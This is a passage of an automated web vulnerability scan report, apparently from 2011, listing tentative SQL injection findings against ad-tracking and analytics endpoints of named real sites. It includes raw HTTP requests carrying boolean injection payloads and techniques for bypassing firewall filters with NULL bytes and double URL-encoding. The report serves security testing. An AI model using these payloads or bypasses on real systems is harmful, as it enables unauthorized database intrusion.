GET /oz/sensor?p=rubicon&pc=6451/11953&cd=false&xt=14&k=southern+union:336,energy+transfer:320,buy+southern:184,4+billion:144,current+datetime:136,linkslist+documentid:136,cnbc:118,energy:114,union:86,billion+cnbc:80,southern:72,transfer:72,please+respect:64,related+links:64,cnbc+welcomes:64,posted+yet:64,cnbc+highlights:64,must+click:64,cnbc+reserves:64,datetime+05:56,2011:56,asia+pacific:56,2011+5:48,5+36:48,6+16:48,expiration+datetime:48,16+2011:48,special+reports:48,datetime+6:48,datetime:46,billion:46,will+benefit:40,energy+news:40,equity+will:40,burgeoning+u:40,union+company:40,gas+production:40,transfer+equity:40,datetime+11:40,midstream+company:40,&t=Energy+Transfer+to+Buy+Southern+Union+for+$4.4+Billion+-+CNBC HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GNQQ9N2W-FJJG-10.204.178.130; put_1994=1voofy6a0tk1w; put_1986=3420415245200633085; put_1512=4dd07bc8-e97b-118c-3dec-7b8c5c306530; put_2101=09035c0c-59c0-487e-ac6a-85a606e2b1c1; put_2132=C3D0C0AD058DDF4DC222CA3B02A8143B; put_2081=AG-00000001389358554; put_1185=4325897289836481830; put_2054=c4f44b7e-9074-47a2-bdf0-9dda4e9d5fa4; xdp_ti="13 Jun 2011 11:13:38 GMT"; lm="13 Jun 2011 11:13:38 GMT"; put_1197=3460050161923843111; khaos=GOVBRMNC-I-DXQD; ruid=154dd07bb6adc1d6f31bfa10^7^1308225202^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; rpb=4940%3D1%264894%3D1%265852%3D1%264210%3D1%267259%3D1%265671%3D1%26733%3D1%264338%3D1%267100%3D1%266432%3D1%266560%3D1%266643%3D1%266198%3D1%264212%3D1%265576%3D1%265421%3D1%265573%3D1%265720%3D1%264214%3D1%262372%3D1; cd=false; dq=21|4|17|0; rdk2=0; ses2=11953^520978879'%20or%201%3d1--%20; csi2=3187870.js^4^1308226504^1308227750&3183300.js^1^1308227126^1308227126; rdk=6451/11953; rdk15=0; ses15=11953^10; csi15=3187871.js^7^1308225219^1308227751&3206204.js^3^1308225202^1308227128

Response 1

HTTP/1.1 204 No Content
Date: Thu, 16 Jun 2011 13:12:08 GMT
Server: TRP Apache-Coyote/1.1
p3p: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: Tue, 01 Jan 2008 00:12:30 GMT
Cache-control: private
Set-Cookie: cd=false; Domain=.rubiconproject.com; Expires=Fri, 15-Jun-2012 13:12:08 GMT; Path=/
Set-Cookie: dq=27|4|23|0; Expires=Fri, 15-Jun-2012 13:12:08 GMT; Path=/
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8

Request 2

GET /oz/sensor?p=rubicon&pc=6451/11953&cd=false&xt=14&k=southern+union:336,energy+transfer:320,buy+southern:184,4+billion:144,current+datetime:136,linkslist+documentid:136,cnbc:118,energy:114,union:86,billion+cnbc:80,southern:72,transfer:72,please+respect:64,related+links:64,cnbc+welcomes:64,posted+yet:64,cnbc+highlights:64,must+click:64,cnbc+reserves:64,datetime+05:56,2011:56,asia+pacific:56,2011+5:48,5+36:48,6+16:48,expiration+datetime:48,16+2011:48,special+reports:48,datetime+6:48,datetime:46,billion:46,will+benefit:40,energy+news:40,equity+will:40,burgeoning+u:40,union+company:40,gas+production:40,transfer+equity:40,datetime+11:40,midstream+company:40,&t=Energy+Transfer+to+Buy+Southern+Union+for+$4.4+Billion+-+CNBC HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GNQQ9N2W-FJJG-10.204.178.130; put_1994=1voofy6a0tk1w; put_1986=3420415245200633085; put_1512=4dd07bc8-e97b-118c-3dec-7b8c5c306530; put_2101=09035c0c-59c0-487e-ac6a-85a606e2b1c1; put_2132=C3D0C0AD058DDF4DC222CA3B02A8143B; put_2081=AG-00000001389358554; put_1185=4325897289836481830; put_2054=c4f44b7e-9074-47a2-bdf0-9dda4e9d5fa4; xdp_ti="13 Jun 2011 11:13:38 GMT"; lm="13 Jun 2011 11:13:38 GMT"; put_1197=3460050161923843111; khaos=GOVBRMNC-I-DXQD; ruid=154dd07bb6adc1d6f31bfa10^7^1308225202^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; rpb=4940%3D1%264894%3D1%265852%3D1%264210%3D1%267259%3D1%265671%3D1%26733%3D1%264338%3D1%267100%3D1%266432%3D1%266560%3D1%266643%3D1%266198%3D1%264212%3D1%265576%3D1%265421%3D1%265573%3D1%265720%3D1%264214%3D1%262372%3D1; cd=false; dq=21|4|17|0; rdk2=0; ses2=11953^520978879'%20or%201%3d2--%20; csi2=3187870.js^4^1308226504^1308227750&3183300.js^1^1308227126^1308227126; rdk=6451/11953; rdk15=0; ses15=11953^10; csi15=3187871.js^7^1308225219^1308227751&3206204.js^3^1308225202^1308227128

Response 2

HTTP/1.1 204 No Content
Date: Thu, 16 Jun 2011 13:12:08 GMT
Server: TRP Apache-Coyote/1.1
Cache-Control: no-store, no-cache, must-revalidate
Cache-control: private
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8


1.36. http://tap.rubiconproject.com/oz/sensor [xt parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://tap.rubiconproject.com
Path:   /oz/sensor

Issue detail

The xt parameter appears to be vulnerable to SQL injection attacks. The payloads %20and%201%3d1--%20 and %20and%201%3d2--%20 were each submitted in the xt parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /oz/sensor?p=rubicon&pc=6451/11953&cd=false&xt=19%20and%201%3d1--%20&k=foreclosure+activity:192,real+estate:192,activity+falls:176,current+datetime:144,linkslist+documentid:144,cnbc:106,foreclosure:98,11+21:88,datetime+11:88,yet+cnbc:80,activity+fall:72,posted+yet:64,must+click:64,cnbc+welcomes:64,featured+real:64,estate+stories:64,related+links:64,please+respect:64,cnbc+reserves:64,21+58:56,58+15:56,asia+pacific:56,2011:56,activity:54,market:48,datetime:46,special+reports:40,housing+market:40,datetime+04:40,datetime+6:40,16+2011:40,2011+4:40,04+24:40,6+16:40,4+27:40,new+push:40,big+banks:40,albeit+still:40,nation's+real:40,estate+market:40,&t=Foreclosure+Activity+Falls,+but+the+Worst+Isn't+Over+Yet+-+CNBC HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43418837
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GNQQ9N2W-FJJG-10.204.178.130; put_1994=1voofy6a0tk1w; put_1986=3420415245200633085; put_1512=4dd07bc8-e97b-118c-3dec-7b8c5c306530; put_2101=09035c0c-59c0-487e-ac6a-85a606e2b1c1; put_2132=C3D0C0AD058DDF4DC222CA3B02A8143B; put_2081=AG-00000001389358554; put_1185=4325897289836481830; ruid=154dd07bb6adc1d6f31bfa10^6^1307963581^2915161843; put_2054=c4f44b7e-9074-47a2-bdf0-9dda4e9d5fa4; xdp_ti="13 Jun 2011 11:13:38 GMT"; lm="13 Jun 2011 11:13:38 GMT"; cd=false; dq=9|4|5|0; khaos=GOVBRMNC-I-DXQD; rpb=4940%3D1%264894%3D1%265852%3D1%264210%3D1%267259%3D1%265671%3D1%26733%3D1%264338%3D1%267100%3D1%266432%3D1%266560%3D1%266643%3D1%266198%3D1%264212%3D1%265576%3D1%265421%3D1%262827%3D1%265573%3D1%265720%3D1%262372%3D1%263810%3D1%262374%3D1%264214%3D1; put_1197=3460050161923843111

Response 1

HTTP/1.1 204 No Content
Date: Thu, 16 Jun 2011 11:27:26 GMT
Server: TRP Apache-Coyote/1.1
p3p: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: Tue, 01 Jan 2008 00:12:30 GMT
Cache-control: private
Set-Cookie: cd=false; Domain=.rubiconproject.com; Expires=Fri, 15-Jun-2012 11:27:26 GMT; Path=/
Set-Cookie: dq=12|4|8|0; Expires=Fri, 15-Jun-2012 11:27:26 GMT; Path=/
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8

Request 2

GET /oz/sensor?p=rubicon&pc=6451/11953&cd=false&xt=19%20and%201%3d2--%20&k=foreclosure+activity:192,real+estate:192,activity+falls:176,current+datetime:144,linkslist+documentid:144,cnbc:106,foreclosure:98,11+21:88,datetime+11:88,yet+cnbc:80,activity+fall:72,posted+yet:64,must+click:64,cnbc+welcomes:64,featured+real:64,estate+stories:64,related+links:64,please+respect:64,cnbc+reserves:64,21+58:56,58+15:56,asia+pacific:56,2011:56,activity:54,market:48,datetime:46,special+reports:40,housing+market:40,datetime+04:40,datetime+6:40,16+2011:40,2011+4:40,04+24:40,6+16:40,4+27:40,new+push:40,big+banks:40,albeit+still:40,nation's+real:40,estate+market:40,&t=Foreclosure+Activity+Falls,+but+the+Worst+Isn't+Over+Yet+-+CNBC HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43418837
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GNQQ9N2W-FJJG-10.204.178.130; put_1994=1voofy6a0tk1w; put_1986=3420415245200633085; put_1512=4dd07bc8-e97b-118c-3dec-7b8c5c306530; put_2101=09035c0c-59c0-487e-ac6a-85a606e2b1c1; put_2132=C3D0C0AD058DDF4DC222CA3B02A8143B; put_2081=AG-00000001389358554; put_1185=4325897289836481830; ruid=154dd07bb6adc1d6f31bfa10^6^1307963581^2915161843; put_2054=c4f44b7e-9074-47a2-bdf0-9dda4e9d5fa4; xdp_ti="13 Jun 2011 11:13:38 GMT"; lm="13 Jun 2011 11:13:38 GMT"; cd=false; dq=9|4|5|0; khaos=GOVBRMNC-I-DXQD; rpb=4940%3D1%264894%3D1%265852%3D1%264210%3D1%267259%3D1%265671%3D1%26733%3D1%264338%3D1%267100%3D1%266432%3D1%266560%3D1%266643%3D1%266198%3D1%264212%3D1%265576%3D1%265421%3D1%262827%3D1%265573%3D1%265720%3D1%262372%3D1%263810%3D1%262374%3D1%264214%3D1; put_1197=3460050161923843111

Response 2

HTTP/1.1 204 No Content
Date: Thu, 16 Jun 2011 11:27:26 GMT
Server: TRP Apache-Coyote/1.1
Cache-Control: no-store, no-cache, must-revalidate
Cache-control: private
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8


1.37. http://wasc.homedepot.com/b/ss/homedepot/1/H.22.1/s11473368444548 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://wasc.homedepot.com
Path:   /b/ss/homedepot/1/H.22.1/s11473368444548

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 4, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /b/ss/homedepot/1%00'/H.22.1/s11473368444548?AQB=1&ndh=1&t=16%2F5%2F2011%206%3A38%3A53%204%20300&ce=UTF-8&ns=homedepot&g=about%3Ablank&cc=USD&ch=errorPage&pageType=errorPage&events=event10&v4=direct&c27=Oops!%20The%20page%20you%20have%20requested%20cannot%20be%20found.&c28=Navigation&s=1920x1200&c=32&j=1.5&v=Y&k=N&bw=1&bh=1&AQE=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: wasc.homedepot.com
Cookie: s_vi=[CS]v1|26FCF56B051D3BA1-60000102200313B4[CE]; 40M3=CT-2

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 16 Jun 2011 11:46:51 GMT
Server: Omniture DC/2.0.0
Content-Length: 412
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b/ss/homedepot/1 was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b/ss/homedepot/1%00''/H.22.1/s11473368444548?AQB=1&ndh=1&t=16%2F5%2F2011%206%3A38%3A53%204%20300&ce=UTF-8&ns=homedepot&g=about%3Ablank&cc=USD&ch=errorPage&pageType=errorPage&events=event10&v4=direct&c27=Oops!%20The%20page%20you%20have%20requested%20cannot%20be%20found.&c28=Navigation&s=1920x1200&c=32&j=1.5&v=Y&k=N&bw=1&bh=1&AQE=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: wasc.homedepot.com
Cookie: s_vi=[CS]v1|26FCF56B051D3BA1-60000102200313B4[CE]; 40M3=CT-2

Response 2

HTTP/1.1 404 Not Found
Date: Thu, 16 Jun 2011 11:46:51 GMT
Server: Omniture DC/2.0.0
xserver: www369
Content-Length: 0
Content-Type: text/html


1.38. http://wasc.homedepot.com/b/ss/homedepot/1/H.22.1/s11999640008134 [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://wasc.homedepot.com
Path:   /b/ss/homedepot/1/H.22.1/s11999640008134

Issue detail

The REST URL parameter 6 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 6, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /b/ss/homedepot/1/H.22.1/s11999640008134%00'?AQB=1&ndh=1&t=16%2F5%2F2011%206%3A56%3A18%204%20300&ce=UTF-8&ns=homedepot&pageName=mostpopular&g=about%3Ablank&cc=USD&c16=Refinements%7CProducts%7CIn%20Store&c35=mostpopular&s=1920x1200&c=32&j=1.5&v=Y&k=N&bw=1&bh=1&ct=lan&hp=Y&pe=lnk_o&pev2=Refinements&AQE=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: wasc.homedepot.com
Cookie: s_vi=[CS]v1|26FCF56B051D3BA1-60000102200313B4[CE]; 40M3=CT-2

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 16 Jun 2011 12:26:56 GMT
Server: Omniture DC/2.0.0
Content-Length: 435
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b/ss/homedepot/1/H.22.1/s11999640008134 was not foun
...[SNIP]...
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b/ss/homedepot/1/H.22.1/s11999640008134%00''?AQB=1&ndh=1&t=16%2F5%2F2011%206%3A56%3A18%204%20300&ce=UTF-8&ns=homedepot&pageName=mostpopular&g=about%3Ablank&cc=USD&c16=Refinements%7CProducts%7CIn%20Store&c35=mostpopular&s=1920x1200&c=32&j=1.5&v=Y&k=N&bw=1&bh=1&ct=lan&hp=Y&pe=lnk_o&pev2=Refinements&AQE=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: wasc.homedepot.com
Cookie: s_vi=[CS]v1|26FCF56B051D3BA1-60000102200313B4[CE]; 40M3=CT-2

Response 2

HTTP/1.1 404 Not Found
Date: Thu, 16 Jun 2011 12:26:56 GMT
Server: Omniture DC/2.0.0
xserver: www438
Content-Length: 0
Content-Type: text/html


1.39. http://wasc.homedepot.com/b/ss/homedepot/1/H.22.1/s12511742944840 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://wasc.homedepot.com
Path:   /b/ss/homedepot/1/H.22.1/s12511742944840

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /b/ss/homedepot%00'/1/H.22.1/s12511742944840?AQB=1&ndh=1&t=16%2F5%2F2011%206%3A54%3A55%204%20300&ce=UTF-8&ns=homedepot&pageName=mostpopular&g=about%3Ablank&cc=USD&c16=Refinements%7CProducts%7CIn%20Store&c35=mostpopular&s=1920x1200&c=32&j=1.5&v=Y&k=N&bw=1&bh=1&ct=lan&hp=Y&pe=lnk_o&pev2=Refinements&AQE=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: wasc.homedepot.com
Cookie: s_vi=[CS]v1|26FCF56B051D3BA1-60000102200313B4[CE]; 40M3=CT-2

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 16 Jun 2011 12:20:43 GMT
Server: Omniture DC/2.0.0
Content-Length: 410
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b/ss/homedepot was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b/ss/homedepot%00''/1/H.22.1/s12511742944840?AQB=1&ndh=1&t=16%2F5%2F2011%206%3A54%3A55%204%20300&ce=UTF-8&ns=homedepot&pageName=mostpopular&g=about%3Ablank&cc=USD&c16=Refinements%7CProducts%7CIn%20Store&c35=mostpopular&s=1920x1200&c=32&j=1.5&v=Y&k=N&bw=1&bh=1&ct=lan&hp=Y&pe=lnk_o&pev2=Refinements&AQE=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: wasc.homedepot.com
Cookie: s_vi=[CS]v1|26FCF56B051D3BA1-60000102200313B4[CE]; 40M3=CT-2

Response 2

HTTP/1.1 404 Not Found
Date: Thu, 16 Jun 2011 12:20:43 GMT
Server: Omniture DC/2.0.0
xserver: www371
Content-Length: 0
Content-Type: text/html


1.40. http://wasc.homedepot.com/b/ss/homedepot/1/H.22.1/s12586278942128 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://wasc.homedepot.com
Path:   /b/ss/homedepot/1/H.22.1/s12586278942128

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /b%2527/ss/homedepot/1/H.22.1/s12586278942128?AQB=1&ndh=1&t=16%2F5%2F2011%206%3A47%3A39%204%20300&ce=UTF-8&ns=homedepot&pageName=mostpopular&g=about%3Ablank&cc=USD&s=1920x1200&c=32&j=1.5&v=Y&k=N&bw=1&bh=1&ct=lan&hp=Y&pe=lnk_e&pev1=http%3A%2F%2Fwww.homedepotgardenclub.com%2FHome.aspx&pid=mostpopular&pidt=1&oid=Flyout-http%3A%2F%2Fwww.homedepotgardenclub.com%2FHome.aspx%3F&oidt=1&ot=A&oi=1&AQE=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: wasc.homedepot.com
Cookie: s_vi=[CS]v1|26FCF56B051D3BA1-60000102200313B4[CE]; 40M3=CT-2

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 16 Jun 2011 12:02:21 GMT
Server: Omniture DC/2.0.0
Content-Length: 438
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b%27/ss/homedepot/1/H.22.1/s12586278942128 was not f
...[SNIP]...
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b%2527%2527/ss/homedepot/1/H.22.1/s12586278942128?AQB=1&ndh=1&t=16%2F5%2F2011%206%3A47%3A39%204%20300&ce=UTF-8&ns=homedepot&pageName=mostpopular&g=about%3Ablank&cc=USD&s=1920x1200&c=32&j=1.5&v=Y&k=N&bw=1&bh=1&ct=lan&hp=Y&pe=lnk_e&pev1=http%3A%2F%2Fwww.homedepotgardenclub.com%2FHome.aspx&pid=mostpopular&pidt=1&oid=Flyout-http%3A%2F%2Fwww.homedepotgardenclub.com%2FHome.aspx%3F&oidt=1&ot=A&oi=1&AQE=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: wasc.homedepot.com
Cookie: s_vi=[CS]v1|26FCF56B051D3BA1-60000102200313B4[CE]; 40M3=CT-2

Response 2

HTTP/1.1 404 Not Found
Date: Thu, 16 Jun 2011 12:02:21 GMT
Server: Omniture DC/2.0.0
xserver: www434
Content-Length: 0
Content-Type: text/html


1.41. http://wasc.homedepot.com/b/ss/homedepot/1/H.22.1/s12715079787576 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://wasc.homedepot.com
Path:   /b/ss/homedepot/1/H.22.1/s12715079787576

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /b/ss%00'/homedepot/1/H.22.1/s12715079787576?AQB=1&ndh=1&t=16%2F5%2F2011%206%3A55%3A27%204%20300&ce=UTF-8&ns=homedepot&g=about%3Ablank&cc=USD&s=1920x1200&c=32&j=1.5&v=Y&k=N&bw=1&bh=1&ct=lan&hp=Y&pe=lnk_e&pev1=http%3A%2F%2Fwww.homedepotgardenclub.com%2FHome.aspx&pid=about%3Ablank&oid=Flyout-http%3A%2F%2Fwww.homedepotgardenclub.com%2FHome.aspx%3F&oidt=1&ot=A&oi=1&AQE=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: wasc.homedepot.com
Cookie: s_vi=[CS]v1|26FCF56B051D3BA1-60000102200313B4[CE]; 40M3=CT-2

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 16 Jun 2011 12:22:23 GMT
Server: Omniture DC/2.0.0
Content-Length: 400
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b/ss was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b/ss%00''/homedepot/1/H.22.1/s12715079787576?AQB=1&ndh=1&t=16%2F5%2F2011%206%3A55%3A27%204%20300&ce=UTF-8&ns=homedepot&g=about%3Ablank&cc=USD&s=1920x1200&c=32&j=1.5&v=Y&k=N&bw=1&bh=1&ct=lan&hp=Y&pe=lnk_e&pev1=http%3A%2F%2Fwww.homedepotgardenclub.com%2FHome.aspx&pid=about%3Ablank&oid=Flyout-http%3A%2F%2Fwww.homedepotgardenclub.com%2FHome.aspx%3F&oidt=1&ot=A&oi=1&AQE=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
